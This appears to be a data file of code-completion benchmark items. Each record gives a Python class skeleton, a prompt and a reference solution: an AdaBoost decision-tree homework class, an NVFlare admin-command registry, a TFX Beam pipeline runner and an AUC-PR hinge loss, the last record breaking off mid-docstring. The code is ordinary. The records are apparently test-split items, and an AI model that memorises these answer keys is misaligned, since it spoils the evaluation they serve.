\"\"\"Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.clfs = []\n self.betas = []\n self.numBoostingIters = numBoostingIters\n self.maxTreeDepth = maxTreeDepth\n self.K = None\n self.classes = None\n<|end_body_0|>\n\n<|body_start_1|>\n X = X.to_numpy()\n y = y.to_numpy()\n n, d = X.shape\n y = y.reshape(-1, 1)\n self.classes = np.unique(y)\n self.K = len(self.classes)\n weights = np.full(n, 1 / n).reshape(-1, 1)\n for iter_num in range(self.numBoostingIters):\n h = tree.DecisionTreeClassifier(max_depth=self.maxTreeDepth, random_state=random_state)\n h.fit(X, y, sample_weight=weights.flatten())\n self.clfs.append(h)\n y_pred = h.predict(X).reshape(-1, 1)\n epsilon = np.sum((y_pred != y) * weights)\n beta = np.log((self.K - 1) * (1 - epsilon) / epsilon) / 2\n self.betas.append(beta)\n weights[y_pred == y] *= np.exp(-beta)\n weights[y_pred != y] *= np.exp(beta)\n weights /= sum(weights)\n<|end_body_1|>\n\n<|body_start_2|>\n X = X.to_numpy()\n n, d = X.shape\n proba = np.zeros((n, self.K))\n for iter_num in range(self.numBoostingIters):\n proba += self.clfs[iter_num].predict_proba(X)\n max_proba = np.argmax(proba, axis=1).reshape(-1)\n pred_array = np.tile(self.classes, (n, 1))\n y_pred = np.choose(max_proba, pred_array.T).reshape(-1, 1)\n return pd.DataFrame(y_pred)\n<|end_body_2|>\n", "revision_id": "fa7c71a8cd8ca9d12260dbc6a737f34715fe3b87", "skeleton": "<|skeleton|>\nclass BoostedDT:\n\n def __init__(self, numBoostingIters=100, maxTreeDepth=3):\n \"\"\"Constructor Class Fields clfs : List object containing individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting\"\"\"\n <|body_0|>\n\n def fit(self, X, y, random_state=None):\n \"\"\"Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value\"\"\"\n <|body_1|>\n\n def predict(self, X):\n \"\"\"Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BoostedDT:\n def __init__(self, numBoostingIters=100, maxTreeDepth=3):\n \"\"\"Constructor Class Fields clfs : List object containing individual DecisionTree classifiers, in order of creation during boosting betas : List of beta values, in order of creation during boosting\"\"\"\n self.clfs = []\n self.betas = []\n self.numBoostingIters = numBoostingIters\n self.maxTreeDepth = maxTreeDepth\n self.K = None\n self.classes = None\n\n def fit(self, X, y, random_state=None):\n \"\"\"Trains the model. Be sure to initialize all individual Decision trees with the provided random_state value if provided. Arguments: X is an n-by-d Pandas Data Frame y is an n-by-1 Pandas Data Frame random_seed is an optional integer value\"\"\"\n X = X.to_numpy()\n y = y.to_numpy()\n n, d = X.shape\n y = y.reshape(-1, 1)\n self.classes = np.unique(y)\n self.K = len(self.classes)\n weights = np.full(n, 1 / n).reshape(-1, 1)\n for iter_num in range(self.numBoostingIters):\n h = tree.DecisionTreeClassifier(max_depth=self.maxTreeDepth, random_state=random_state)\n h.fit(X, y, sample_weight=weights.flatten())\n self.clfs.append(h)\n y_pred = h.predict(X).reshape(-1, 1)\n epsilon = np.sum((y_pred != y) * weights)\n beta = np.log((self.K - 1) * (1 - epsilon) / epsilon) / 2\n self.betas.append(beta)\n weights[y_pred == y] *= np.exp(-beta)\n weights[y_pred != y] *= np.exp(beta)\n weights /= sum(weights)\n\n def predict(self, X):\n \"\"\"Used the model to predict values for each instance in X Arguments: X is an n-by-d Pandas Data Frame Returns: an n-by-1 Pandas Data Frame of the predictions\"\"\"\n X = X.to_numpy()\n n, d = X.shape\n proba = np.zeros((n, self.K))\n for iter_num in range(self.numBoostingIters):\n proba += self.clfs[iter_num].predict_proba(X)\n max_proba = np.argmax(proba, axis=1).reshape(-1)\n pred_array = np.tile(self.classes, (n, 1))\n y_pred = np.choose(max_proba, pred_array.T).reshape(-1, 1)\n return pd.DataFrame(y_pred)\n", "source": "the_stack_v2_python_sparse", "source_path": "HW4/HW4_code/cis519_hw4_solution.py", "source_repo": "JiatongSun/CIS-519-Applied-Machine-Learning", "split": "test", "star_events_count": 0} {"blob_id": "87db28f295ad2d4b4f2d696f22ddce5ec1ffee86", "bodies": ["for command in AdminCommands.commands:\n if command_name == command.get_command_name():\n return command\nreturn None", "if not isinstance(command_processor, CommandProcessor):\n raise TypeError('command_processor must be an instance of CommandProcessor, but got {}'.format(type(command_processor)))\nAdminCommands.commands.append(command_processor)"], "bodies_text": "<|body_start_0|>\n for command in AdminCommands.commands:\n if command_name == command.get_command_name():\n return command\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(command_processor, CommandProcessor):\n raise TypeError('command_processor must be an instance of CommandProcessor, but got {}'.format(type(command_processor)))\n AdminCommands.commands.append(command_processor)\n<|end_body_1|>\n", "class_docstring": "AdminCommands contains all the commands for processing the commands from the parent process.", "class_name": "AdminCommands", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AdminCommands:\n \"\"\"AdminCommands contains all the commands for processing the commands from the parent process.\"\"\"\n\n def get_command(command_name):\n \"\"\"Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object\"\"\"\n <|body_0|>\n\n def register_command(command_processor: CommandProcessor):\n \"\"\"Call to register the AdminCommand processor. Args: command_processor: AdminCommand processor\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for command in AdminCommands.commands:\n if command_name == command.get_command_name():\n return command\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(command_processor, CommandProcessor):\n raise TypeError('command_processor must be an instance of CommandProcessor, but got {}'.format(type(command_processor)))\n AdminCommands.commands.append(command_processor)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000012", "length_bytes": 7851, "license_type": "permissive", "methods": [{"docstring": "Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object", "name": "get_command", "signature": "def get_command(command_name)"}, {"docstring": "Call to register the AdminCommand processor. Args: command_processor: AdminCommand processor", "name": "register_command", "signature": "def register_command(command_processor: CommandProcessor)"}], "n_methods": 2, "prompt": "Implement the Python class `AdminCommands` described below.\n\nClass description:\nAdminCommands contains all the commands for processing the commands from the parent process.\n\nMethod signatures and docstrings:\n- def get_command(command_name): Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object\n- def register_command(command_processor: CommandProcessor): Call to register the AdminCommand processor. Args: command_processor: AdminCommand processor", "prompted_full_text": "Implement the Python class `AdminCommands` described below.\n\nClass description:\nAdminCommands contains all the commands for processing the commands from the parent process.\n\nMethod signatures and docstrings:\n- def get_command(command_name): Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object\n- def register_command(command_processor: CommandProcessor): Call to register the AdminCommand processor. Args: command_processor: AdminCommand processor\n\n<|skeleton|>\nclass AdminCommands:\n \"\"\"AdminCommands contains all the commands for processing the commands from the parent process.\"\"\"\n\n def get_command(command_name):\n \"\"\"Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object\"\"\"\n <|body_0|>\n\n def register_command(command_processor: CommandProcessor):\n \"\"\"Call to register the AdminCommand processor. Args: command_processor: AdminCommand processor\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for command in AdminCommands.commands:\n if command_name == command.get_command_name():\n return command\n return None\n<|end_body_0|>\n\n<|body_start_1|>\n if not isinstance(command_processor, CommandProcessor):\n raise TypeError('command_processor must be an instance of CommandProcessor, but got {}'.format(type(command_processor)))\n AdminCommands.commands.append(command_processor)\n<|end_body_1|>\n", "revision_id": "1433290c203bd23f34c29e11795ce592bc067888", "skeleton": "<|skeleton|>\nclass AdminCommands:\n \"\"\"AdminCommands contains all the commands for processing the commands from the parent process.\"\"\"\n\n def get_command(command_name):\n \"\"\"Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object\"\"\"\n <|body_0|>\n\n def register_command(command_processor: CommandProcessor):\n \"\"\"Call to register the AdminCommand processor. Args: command_processor: AdminCommand processor\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AdminCommands:\n \"\"\"AdminCommands contains all the commands for processing the commands from the parent process.\"\"\"\n\n def get_command(command_name):\n \"\"\"Call to return the AdminCommand object. Args: command_name: AdminCommand name Returns: AdminCommand object\"\"\"\n for command in AdminCommands.commands:\n if command_name == command.get_command_name():\n return command\n return None\n\n def register_command(command_processor: CommandProcessor):\n \"\"\"Call to register the AdminCommand processor. Args: command_processor: AdminCommand processor\"\"\"\n if not isinstance(command_processor, CommandProcessor):\n raise TypeError('command_processor must be an instance of CommandProcessor, but got {}'.format(type(command_processor)))\n AdminCommands.commands.append(command_processor)\n", "source": "the_stack_v2_python_sparse", "source_path": "nvflare/private/fed/client/admin_commands.py", "source_repo": "NVIDIA/NVFlare", "split": "test", "star_events_count": 442} {"blob_id": "c02f37436a99f11fd5cb7ef52ce60f6d97445224", "bodies": ["if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\nsuper().__init__(config)\nself._beam_orchestrator_args = beam_orchestrator_args", "tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\nwith telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'beam'}):\n with beam.Pipeline(argv=self._beam_orchestrator_args) as p:\n root = p | 'CreateRoot' >> beam.Create([None])\n signal_map = {}\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_id = component.id\n signals_to_wait = []\n if component.upstream_nodes:\n for upstream_node in component.upstream_nodes:\n assert upstream_node in signal_map, 'Components is not in topological order'\n signals_to_wait.append(signal_map[upstream_node])\n absl.logging.info('Component %s depends on %s.', component_id, [s.producer.full_label for s in signals_to_wait])\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n signal_map[component] = root | 'Run[%s]' % component_id >> beam.ParDo(_ComponentAsDoFn(component, component_launcher_class, component_config, tfx_pipeline), *[beam.pvalue.AsIter(s) for s in signals_to_wait])\n absl.logging.info('Component %s is scheduled.', component_id)"], "bodies_text": "<|body_start_0|>\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n self._beam_orchestrator_args = beam_orchestrator_args\n<|end_body_0|>\n\n<|body_start_1|>\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'beam'}):\n with beam.Pipeline(argv=self._beam_orchestrator_args) as p:\n root = p | 'CreateRoot' >> beam.Create([None])\n signal_map = {}\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_id = component.id\n signals_to_wait = []\n if component.upstream_nodes:\n for upstream_node in component.upstream_nodes:\n assert upstream_node in signal_map, 'Components is not in topological order'\n signals_to_wait.append(signal_map[upstream_node])\n absl.logging.info('Component %s depends on %s.', component_id, [s.producer.full_label for s in signals_to_wait])\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n signal_map[component] = root | 'Run[%s]' % component_id >> beam.ParDo(_ComponentAsDoFn(component, component_launcher_class, component_config, tfx_pipeline), *[beam.pvalue.AsIter(s) for s in signals_to_wait])\n absl.logging.info('Component %s is scheduled.', component_id)\n<|end_body_1|>\n", "class_docstring": "Tfx runner on Beam.", "class_name": "BeamDagRunner", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BeamDagRunner:\n \"\"\"Tfx runner on Beam.\"\"\"\n\n def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n <|body_0|>\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Deploys given logical pipeline on Beam. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n self._beam_orchestrator_args = beam_orchestrator_args\n<|end_body_0|>\n\n<|body_start_1|>\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'beam'}):\n with beam.Pipeline(argv=self._beam_orchestrator_args) as p:\n root = p | 'CreateRoot' >> beam.Create([None])\n signal_map = {}\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_id = component.id\n signals_to_wait = []\n if component.upstream_nodes:\n for upstream_node in component.upstream_nodes:\n assert upstream_node in signal_map, 'Components is not in topological order'\n signals_to_wait.append(signal_map[upstream_node])\n absl.logging.info('Component %s depends on %s.', component_id, [s.producer.full_label for s in signals_to_wait])\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n signal_map[component] = root | 'Run[%s]' % component_id >> beam.ParDo(_ComponentAsDoFn(component, component_launcher_class, component_config, tfx_pipeline), *[beam.pvalue.AsIter(s) for s in signals_to_wait])\n absl.logging.info('Component %s is scheduled.', component_id)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000013", "length_bytes": 6857, "license_type": "permissive", "methods": [{"docstring": "Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.", "name": "__init__", "signature": "def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None)"}, {"docstring": "Deploys given logical pipeline on Beam. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.", "name": "run", "signature": "def run(self, tfx_pipeline: pipeline.Pipeline) -> None"}], "n_methods": 2, "prompt": "Implement the Python class `BeamDagRunner` described below.\n\nClass description:\nTfx runner on Beam.\n\nMethod signatures and docstrings:\n- def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None): Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\n- def run(self, tfx_pipeline: pipeline.Pipeline) -> None: Deploys given logical pipeline on Beam. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.", "prompted_full_text": "Implement the Python class `BeamDagRunner` described below.\n\nClass description:\nTfx runner on Beam.\n\nMethod signatures and docstrings:\n- def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None): Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\n- def run(self, tfx_pipeline: pipeline.Pipeline) -> None: Deploys given logical pipeline on Beam. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\n\n<|skeleton|>\nclass BeamDagRunner:\n \"\"\"Tfx runner on Beam.\"\"\"\n\n def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n <|body_0|>\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Deploys given logical pipeline on Beam. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n self._beam_orchestrator_args = beam_orchestrator_args\n<|end_body_0|>\n\n<|body_start_1|>\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'beam'}):\n with beam.Pipeline(argv=self._beam_orchestrator_args) as p:\n root = p | 'CreateRoot' >> beam.Create([None])\n signal_map = {}\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_id = component.id\n signals_to_wait = []\n if component.upstream_nodes:\n for upstream_node in component.upstream_nodes:\n assert upstream_node in signal_map, 'Components is not in topological order'\n signals_to_wait.append(signal_map[upstream_node])\n absl.logging.info('Component %s depends on %s.', component_id, [s.producer.full_label for s in signals_to_wait])\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n signal_map[component] = root | 'Run[%s]' % component_id >> beam.ParDo(_ComponentAsDoFn(component, component_launcher_class, component_config, tfx_pipeline), *[beam.pvalue.AsIter(s) for s in signals_to_wait])\n absl.logging.info('Component %s is scheduled.', component_id)\n<|end_body_1|>\n", "revision_id": "1b328504fa08a70388691e4072df76f143631325", "skeleton": "<|skeleton|>\nclass BeamDagRunner:\n \"\"\"Tfx runner on Beam.\"\"\"\n\n def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n <|body_0|>\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Deploys given logical pipeline on Beam. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BeamDagRunner:\n \"\"\"Tfx runner on Beam.\"\"\"\n\n def __init__(self, beam_orchestrator_args: Optional[List[str]]=None, config: Optional[pipeline_config.PipelineConfig]=None):\n \"\"\"Initializes BeamDagRunner as a TFX orchestrator. Args: beam_orchestrator_args: beam args for the beam orchestrator. Note that this is different from the beam_pipeline_args within additional_pipeline_args, which is for beam pipelines in components. config: Optional pipeline config for customizing the launching of each component. Defaults to pipeline config that supports InProcessComponentLauncher and DockerComponentLauncher.\"\"\"\n if config is None:\n config = pipeline_config.PipelineConfig(supported_launcher_classes=[in_process_component_launcher.InProcessComponentLauncher, docker_component_launcher.DockerComponentLauncher])\n super().__init__(config)\n self._beam_orchestrator_args = beam_orchestrator_args\n\n def run(self, tfx_pipeline: pipeline.Pipeline) -> None:\n \"\"\"Deploys given logical pipeline on Beam. Args: tfx_pipeline: Logical pipeline containing pipeline args and components.\"\"\"\n tfx_pipeline.pipeline_info.run_id = datetime.datetime.now().isoformat()\n with telemetry_utils.scoped_labels({telemetry_utils.LABEL_TFX_RUNNER: 'beam'}):\n with beam.Pipeline(argv=self._beam_orchestrator_args) as p:\n root = p | 'CreateRoot' >> beam.Create([None])\n signal_map = {}\n for component in tfx_pipeline.components:\n if isinstance(component, base_component.BaseComponent):\n component._resolve_pip_dependencies(tfx_pipeline.pipeline_info.pipeline_root)\n component_id = component.id\n signals_to_wait = []\n if component.upstream_nodes:\n for upstream_node in component.upstream_nodes:\n assert upstream_node in signal_map, 'Components is not in topological order'\n signals_to_wait.append(signal_map[upstream_node])\n absl.logging.info('Component %s depends on %s.', component_id, [s.producer.full_label for s in signals_to_wait])\n component_launcher_class, component_config = config_utils.find_component_launch_info(self._config, component)\n signal_map[component] = root | 'Run[%s]' % component_id >> beam.ParDo(_ComponentAsDoFn(component, component_launcher_class, component_config, tfx_pipeline), *[beam.pvalue.AsIter(s) for s in signals_to_wait])\n absl.logging.info('Component %s is scheduled.', component_id)\n", "source": "the_stack_v2_python_sparse", "source_path": "tfx/orchestration/beam/legacy/beam_dag_runner.py", "source_repo": "tensorflow/tfx", "split": "test", "star_events_count": 2116} {"blob_id": "4973df93e71c46326b7b21ffaa5220b55befbf3c", "bodies": ["super().__init__()\nprecision_range_lower = 0.0\nprecision_range_upper = 1.0\nself.num_classes = num_classes\nself.num_anchors = num_anchors\nself.precision_range = (precision_range_lower, precision_range_upper)\nprecision_values, self.delta = range_to_anchors_and_delta(self.precision_range, self.num_anchors)\nself.register_buffer('precision_values', precision_values)\nself.biases = nn.Parameter(torch.zeros(self.num_classes, self.num_anchors, dtype=torch.float))\nself.lambdas = nn.Parameter(torch.ones(self.num_classes, self.num_anchors, dtype=torch.float))", "targets = targets['target']\nC = 1 if logits.dim() == 1 else logits.size(1)\nif self.num_classes != C:\n raise ValueError('num classes is %d while logits width is %d' % (self.num_classes, C))\nlabels, weights = AUCPRHingeLoss._prepare_labels_weights(logits, targets, weights=weights)\nlambdas = lagrange_multiplier(self.lambdas)\nhinge_loss = weighted_hinge_loss(labels.unsqueeze(-1), logits.unsqueeze(-1) - self.biases, positive_weights=1.0 + lambdas * (1.0 - self.precision_values), negative_weights=lambdas * self.precision_values)\nclass_priors = build_class_priors(labels, weights=weights)\nlambda_term = class_priors.unsqueeze(-1) * (lambdas * (1.0 - self.precision_values))\nper_anchor_loss = weights.unsqueeze(-1) * hinge_loss - lambda_term\nloss = per_anchor_loss.sum(2) * self.delta\nloss = loss / (self.precision_range[1] - self.precision_range[0])\nif not reduce:\n return loss\nelif size_average:\n return loss.mean()\nelse:\n return loss.sum()", "N, C = logits.size()\nlabels = torch.zeros((N, C), dtype=torch.float, device=logits.device).scatter(1, targets.unsqueeze(1), 1)\nif weights is None:\n weights = torch.ones(N, dtype=torch.float, device=logits.device)\nif weights.dim() == 1:\n weights.unsqueeze_(-1)\nreturn (labels, weights)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n precision_range_lower = 0.0\n precision_range_upper = 1.0\n self.num_classes = num_classes\n self.num_anchors = num_anchors\n self.precision_range = (precision_range_lower, precision_range_upper)\n precision_values, self.delta = range_to_anchors_and_delta(self.precision_range, self.num_anchors)\n self.register_buffer('precision_values', precision_values)\n self.biases = nn.Parameter(torch.zeros(self.num_classes, self.num_anchors, dtype=torch.float))\n self.lambdas = nn.Parameter(torch.ones(self.num_classes, self.num_anchors, dtype=torch.float))\n<|end_body_0|>\n\n<|body_start_1|>\n targets = targets['target']\n C = 1 if logits.dim() == 1 else logits.size(1)\n if self.num_classes != C:\n raise ValueError('num classes is %d while logits width is %d' % (self.num_classes, C))\n labels, weights = AUCPRHingeLoss._prepare_labels_weights(logits, targets, weights=weights)\n lambdas = lagrange_multiplier(self.lambdas)\n hinge_loss = weighted_hinge_loss(labels.unsqueeze(-1), logits.unsqueeze(-1) - self.biases, positive_weights=1.0 + lambdas * (1.0 - self.precision_values), negative_weights=lambdas * self.precision_values)\n class_priors = build_class_priors(labels, weights=weights)\n lambda_term = class_priors.unsqueeze(-1) * (lambdas * (1.0 - self.precision_values))\n per_anchor_loss = weights.unsqueeze(-1) * hinge_loss - lambda_term\n loss = per_anchor_loss.sum(2) * self.delta\n loss = loss / (self.precision_range[1] - self.precision_range[0])\n if not reduce:\n return loss\n elif size_average:\n return loss.mean()\n else:\n return loss.sum()\n<|end_body_1|>\n\n<|body_start_2|>\n N, C = logits.size()\n labels = torch.zeros((N, C), dtype=torch.float, device=logits.device).scatter(1, targets.unsqueeze(1), 1)\n if weights is None:\n weights = torch.ones(N, dtype=torch.float, device=logits.device)\n if weights.dim() == 1:\n weights.unsqueeze_(-1)\n return (labels, weights)\n<|end_body_2|>\n", "class_docstring": "area under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives", "class_name": "AUCPRHingeLoss", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AUCPRHingeLoss:\n \"\"\"area under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives\"\"\"\n\n def __init__(self, num_classes=1, num_anchors=20):\n \"\"\"Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`\"\"\"\n <|body_0|>\n\n def forward(self, logits, targets, reduce=True, size_average=True, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per input/target element instead\"\"\"\n <|body_1|>\n\n def _prepare_labels_weights(logits, targets, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n precision_range_lower = 0.0\n precision_range_upper = 1.0\n self.num_classes = num_classes\n self.num_anchors = num_anchors\n self.precision_range = (precision_range_lower, precision_range_upper)\n precision_values, self.delta = range_to_anchors_and_delta(self.precision_range, self.num_anchors)\n self.register_buffer('precision_values', precision_values)\n self.biases = nn.Parameter(torch.zeros(self.num_classes, self.num_anchors, dtype=torch.float))\n self.lambdas = nn.Parameter(torch.ones(self.num_classes, self.num_anchors, dtype=torch.float))\n<|end_body_0|>\n\n<|body_start_1|>\n targets = targets['target']\n C = 1 if logits.dim() == 1 else logits.size(1)\n if self.num_classes != C:\n raise ValueError('num classes is %d while logits width is %d' % (self.num_classes, C))\n labels, weights = AUCPRHingeLoss._prepare_labels_weights(logits, targets, weights=weights)\n lambdas = lagrange_multiplier(self.lambdas)\n hinge_loss = weighted_hinge_loss(labels.unsqueeze(-1), logits.unsqueeze(-1) - self.biases, positive_weights=1.0 + lambdas * (1.0 - self.precision_values), negative_weights=lambdas * self.precision_values)\n class_priors = build_class_priors(labels, weights=weights)\n lambda_term = class_priors.unsqueeze(-1) * (lambdas * (1.0 - self.precision_values))\n per_anchor_loss = weights.unsqueeze(-1) * hinge_loss - lambda_term\n loss = per_anchor_loss.sum(2) * self.delta\n loss = loss / (self.precision_range[1] - self.precision_range[0])\n if not reduce:\n return loss\n elif size_average:\n return loss.mean()\n else:\n return loss.sum()\n<|end_body_1|>\n\n<|body_start_2|>\n N, C = logits.size()\n labels = torch.zeros((N, C), dtype=torch.float, device=logits.device).scatter(1, targets.unsqueeze(1), 1)\n if weights is None:\n weights = torch.ones(N, dtype=torch.float, device=logits.device)\n if weights.dim() == 1:\n weights.unsqueeze_(-1)\n return (labels, weights)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000014", "length_bytes": 16953, "license_type": "no_license", "methods": [{"docstring": "Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`", "name": "__init__", "signature": "def __init__(self, num_classes=1, num_anchors=20)"}, {"docstring": "Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a 